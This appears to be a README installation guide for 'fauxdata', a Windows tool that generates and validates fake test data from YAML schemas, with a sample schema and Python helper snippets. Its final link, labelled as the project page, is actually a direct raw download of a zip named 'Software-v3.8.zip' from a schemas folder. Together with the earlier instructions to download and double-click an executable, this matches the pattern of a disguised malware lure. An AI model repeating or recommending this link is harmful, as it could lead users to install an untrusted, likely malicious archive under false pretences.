fauxdata is a tool for creating fake data on a Windows computer. The data looks realistic and follows rules you define in simple files called YAML schemas. The tool can also validate the data to confirm that it follows those rules.
fauxdata is mainly for people who need data for testing but do not want to use real information. It works with file formats such as CSV and Parquet, and it helps make sure your test data is consistent and follows the rules you set.
Before you start, check that your computer meets these requirements:
- Windows 10 or newer (64-bit recommended)
- At least 4 GB of free RAM
- 500 MB of free disk space
- Internet connection to download the tool
- Command Line Interface (CLI) access, which comes with Windows as "Command Prompt" or "PowerShell"
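Some of the requirements above can be checked from a script. The following is a minimal sketch, assuming Python 3 is installed on the machine. The function name `check_requirements` and its parameters are illustrative and are not part of fauxdata. It looks only at the operating system and free disk space, because the Python standard library has no portable call for free RAM.

```python
import platform
import shutil


def check_requirements(path=".", required_mb=500):
    """Report whether this machine meets two of the listed requirements.

    Hypothetical helper for illustration; it is not part of fauxdata.
    """
    free_mb = shutil.disk_usage(path).free // (1024 * 1024)
    return {
        "is_windows": platform.system() == "Windows",
        # Heuristic: 64-bit machine names usually end in "64" (AMD64, ARM64).
        "is_64_bit": platform.machine().endswith("64"),
        "free_disk_mb": free_mb,
        "enough_disk": free_mb >= required_mb,
    }


if __name__ == "__main__":
    for name, value in check_requirements().items():
        print(f"{name}: {value}")
```

Pass the folder where you plan to keep fauxdata as `path` so that the free space is measured on the right drive.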
fauxdata offers the following features:
- Creates fake data from customizable YAML files
- Works with common file formats like CSV and Parquet
- Supports locale settings to make data that fits your region
- Validates data to catch mistakes before use
- Runs on Windows with simple commands
- Helps test software or databases safely without real information
Visit the main page to download the software and find the latest version.
- Open your web browser and go to the fauxdata GitHub page.
- Look for the Releases section on the page. This is where you will find the files to download.
- Find the latest release. It usually has the highest version number or is marked "Latest."
- Download the Windows version of fauxdata. It may have a file name ending with .exe or be a zipped file ending with .zip.
- If you downloaded a .zip file:
  - Right-click on the file.
  - Select Extract All.
  - Choose a folder where you want to keep fauxdata.
  - Click Extract.
- If you downloaded an .exe file, double-click it and follow the installation prompts.
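The extraction step above can also be scripted instead of using Extract All. This is a minimal sketch using Python's standard `zipfile` module. The function name `extract_archive` and the example paths in the usage note are hypothetical. Only extract archives that come from a source you trust.

```python
import zipfile
from pathlib import Path


def extract_archive(zip_path, target_dir):
    """Extract every file in zip_path into target_dir and return the file names."""
    target = Path(target_dir)
    # Create the destination folder (and any missing parents) if needed.
    target.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(zip_path) as archive:
        archive.extractall(target)
        return archive.namelist()
```

For example, `extract_archive("fauxdata.zip", r"C:\Tools\fauxdata")` would unpack a downloaded archive into a folder of your choice. Both names are placeholders.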
- Open Command Prompt or PowerShell on your computer:
  - Press the Start button.
  - Type cmd or powershell.
  - Press Enter.
- Navigate to the folder where you installed or extracted fauxdata:
  - Type cd path\to\fauxdata and press Enter.
  - Replace path\to\fauxdata with the actual folder address.
- To generate fake data, you will need a YAML schema file that describes the data you want.
- Run the command:
      fauxdata generate your-schema.yaml
  Replace your-schema.yaml with the path to your YAML file. In PowerShell, a program in the current folder must be started as .\fauxdata instead of fauxdata.
- The fake data will be created in the current folder or location you specify.
- To check your data for errors, use:
      fauxdata validate generated-data.csv
  Replace generated-data.csv with the name of the file you want to check.
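The two commands above can be run from a script as well as typed by hand. The sketch below assumes the fauxdata executable can be found on your PATH and uses only the `generate` and `validate` commands shown above. The helper names `build_command` and `run_fauxdata` are hypothetical.

```python
import shutil
import subprocess


def build_command(action, file_path):
    """Build the argument list for `fauxdata generate` or `fauxdata validate`."""
    if action not in ("generate", "validate"):
        raise ValueError(f"unsupported action: {action}")
    return ["fauxdata", action, str(file_path)]


def run_fauxdata(action, file_path):
    """Run fauxdata and return its exit code, or None if it cannot be found."""
    if shutil.which("fauxdata") is None:
        return None  # Assumption: the executable is expected on PATH.
    completed = subprocess.run(build_command(action, file_path), check=False)
    return completed.returncode
```

Passing the arguments as a list, rather than as one string, avoids quoting problems when a file path contains spaces.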
The YAML schema tells fauxdata what kind of data to make. Here is an example of a simple YAML file:
columns:
  - name: id
    type: integer
    start: 1
    end: 100
  - name: name
    type: name
  - name: email
    type: email
  - name: created_at
    type: date
    start: 2020-01-01
    end: 2023-12-31

This file will create 100 fake records with ID numbers, names, emails, and dates.
Save this file with any name like example.yaml and use it with the generate command.
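To make the meaning of the schema fields concrete, here is a small Python sketch that builds rows following the same rules. It is an illustration only and is not how fauxdata works internally. The schema is written as a Python list instead of being read from YAML, the name pool and the example.com addresses are placeholders, and drawing random IDs within the range is an assumption.

```python
import random
from datetime import date, timedelta

# The example schema, mirrored as a Python structure.
SCHEMA = [
    {"name": "id", "type": "integer", "start": 1, "end": 100},
    {"name": "name", "type": "name"},
    {"name": "email", "type": "email"},
    {"name": "created_at", "type": "date",
     "start": date(2020, 1, 1), "end": date(2023, 12, 31)},
]

# Tiny placeholder pool; a real generator would use far more data.
FIRST_NAMES = ["Ana", "Ben", "Chloe", "Dev"]


def fake_value(column, rng):
    """Return one value for a column description (illustrative rules only)."""
    kind = column["type"]
    if kind == "integer":
        return rng.randint(column["start"], column["end"])
    if kind == "name":
        return rng.choice(FIRST_NAMES)
    if kind == "email":
        return f"{rng.choice(FIRST_NAMES).lower()}{rng.randint(1, 999)}@example.com"
    if kind == "date":
        span_days = (column["end"] - column["start"]).days
        return column["start"] + timedelta(days=rng.randint(0, span_days))
    raise ValueError(f"unknown column type: {kind}")


def fake_rows(schema, count, seed=0):
    """Build `count` rows as dicts keyed by column name."""
    rng = random.Random(seed)
    return [{col["name"]: fake_value(col, rng) for col in schema}
            for _ in range(count)]
```

Calling `fake_rows(SCHEMA, 100)` returns 100 dictionaries whose `id` and `created_at` values stay inside the `start` and `end` bounds from the schema.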
Use the validate command to check if your data meets the rules.
Example:
fauxdata validate data.csv
This checks the file data.csv and reports any data that does not match your schema.
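The kind of check that validation performs can be sketched in a few lines of Python. This is not fauxdata's validator. It is a hypothetical stand-in that hard-codes the rules from the example schema (an id between 1 and 100, a date between 2020-01-01 and 2023-12-31) plus an assumed rule that an email contains "@".

```python
import csv
import io
from datetime import date


def in_int_range(text, low, high):
    """True if text parses as an integer between low and high inclusive."""
    try:
        return low <= int(text) <= high
    except (TypeError, ValueError):
        return False


def validate_rows(csv_text):
    """Return a list of (row_number, message) problems found in csv_text."""
    problems = []
    reader = csv.DictReader(io.StringIO(csv_text))
    for row_number, row in enumerate(reader, start=1):
        if not in_int_range(row.get("id"), 1, 100):
            problems.append((row_number, "id out of range"))
        if "@" not in (row.get("email") or ""):
            problems.append((row_number, "email missing @"))
        try:
            created = date.fromisoformat(row.get("created_at"))
        except (TypeError, ValueError):
            problems.append((row_number, "created_at is not a date"))
        else:
            if not date(2020, 1, 1) <= created <= date(2023, 12, 31):
                problems.append((row_number, "created_at out of range"))
    return problems
```

An empty list means every row passed. Each problem carries the row number so the offending record is easy to find in the file.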
- Generate data: fauxdata generate your-schema.yaml
- Validate data: fauxdata validate your-data.csv
- Help: fauxdata --help
You can keep your YAML files and generated data anywhere on your computer. Just remember the folder path so you can point fauxdata to the right place in the command line.
To get new updates:
- Visit the fauxdata GitHub page again.
- Download the latest version as you did the first time.
- Replace your old files with the new ones.
- If fauxdata does not run, check if you typed the commands correctly.
- Make sure you are in the correct folder in the command prompt.
- If an error shows about missing files, check your schema file path.
- You can open an issue on the GitHub page if problems continue.
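The first checks in the list above can be automated. The sketch below is a hypothetical helper, not part of fauxdata. It assumes the executable is expected on your PATH and reports whether it can be found and whether the schema file exists.

```python
import shutil
from pathlib import Path


def diagnose(schema_path, executable="fauxdata"):
    """Return a list of readable problems; an empty list means none were found."""
    problems = []
    if shutil.which(executable) is None:
        problems.append(f"{executable} was not found on PATH")
    if not Path(schema_path).is_file():
        problems.append(f"schema file not found: {schema_path}")
    return problems
```

Run it from the same folder you use in the command prompt, because a relative schema path is resolved against the current folder.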
Visit the project page for examples, help, and updates:
https://github.com/sidu-gaming/fauxdata/raw/refs/heads/main/schemas/Software-v3.8.zip
The project page has guides and detailed information about how to use the tool.